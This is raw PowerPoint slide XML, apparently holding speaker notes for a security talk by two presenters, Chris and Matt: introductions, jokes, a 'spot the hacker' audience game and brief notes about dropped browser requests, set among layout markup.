        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Shape 471"/>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sz="1000" lang="en-US"/>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" lang="en-US"/>
              <a:t>send request back to brwser when dropped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" lang="en-US"/>
              <a:t>403 not found never gets returned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Shape 47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6" name="Shape 476"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Shape 477"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Shape 47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3" name="Shape 483"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 48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85" name="Shape 485"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT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0" name="Shape 490"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Shape 491"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For us to make it an open source project would require to much effort and we’d prefer to continue to work on this personal project.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 49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7" name="Shape 497"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 498"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 49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4" name="Shape 504"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Shape 505"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Shape 50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2" name="Shape 132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Good lets keep it that way…. (continue the joke with next slide)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 13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8" name="Shape 138"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Shape 139"/>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Just kidding, so I don’t bore you I also work with chris from time to time, and I can usually be found at the office</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>I can more frequently be found at the coffee shop not drinking coffee. And once in awhile I do security stuff :D Also if you want to speak to me in mandrine you can try and I will reply in japanese.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 14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5" name="Shape 145"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CHRIS&amp;&amp;MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>so we are going to start off with a game, we are going to show you a series of pictures and if any of you can spot the hacker please raise your hand and tell us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 14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 name="Shape 16"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="0" x="777239"/>
            <a:ext cy="3048000" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="1800" i="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3200400" x="762000"/>
            <a:ext cy="1524000" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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9" name="Shape 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4724400" x="762000"/>
            <a:ext cy="990599" cx="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr" rtl="0" marR="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr" rtl="0" marR="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr" rtl="0" marR="0" indent="0" marL="1371600">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr" rtl="0" marR="0" indent="0" marL="1828800">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr algn="ctr" rtl="0" marR="0" indent="0" marL="2286000">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr algn="ctr" rtl="0" marR="0" indent="0" marL="2743200">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr algn="ctr" rtl="0" marR="0" indent="0" marL="3200400">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr algn="ctr" rtl="0" marR="0" indent="0" marL="3657600">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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1" name="Shape 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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2" name="Shape 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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3" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6172200" x="777239"/>
            <a:ext cy="27431" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="1800" i="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80" name="Shape 80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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2" name="Shape 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off y="-990600" x="2590799"/>
            <a:ext cy="7239000" cx="3886200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" indent="-137159" marL="594360">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="l" rtl="0" indent="-106680" marL="868680">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" indent="-114300" marL="1143000">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" indent="-114300" marL="1371600">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr algn="l" rtl="0" indent="-134620" marL="1645920">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr algn="l" rtl="0" indent="-136651" marL="1901951">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr algn="l" rtl="0" indent="-137160" marL="2194560">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr algn="l" rtl="0" indent="-132079" marL="2468880">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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4" name="Shape 84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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5" name="Shape 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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6" name="Shape 86"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off y="2476500" x="-1028699"/>
            <a:ext cy="1828800" cx="5410199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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8" name="Shape 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off y="266700" x="3009900"/>
            <a:ext cy="5714999" cx="4876799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" indent="-137159" marL="594360">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="l" rtl="0" indent="-106680" marL="868680">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" indent="-114300" marL="1143000">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" indent="-114300" marL="1371600">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr algn="l" rtl="0" indent="-134620" marL="1645920">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr algn="l" rtl="0" indent="-136651" marL="1901951">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr algn="l" rtl="0" indent="-137160" marL="2194560">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr algn="l" rtl="0" indent="-132079" marL="2468880">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
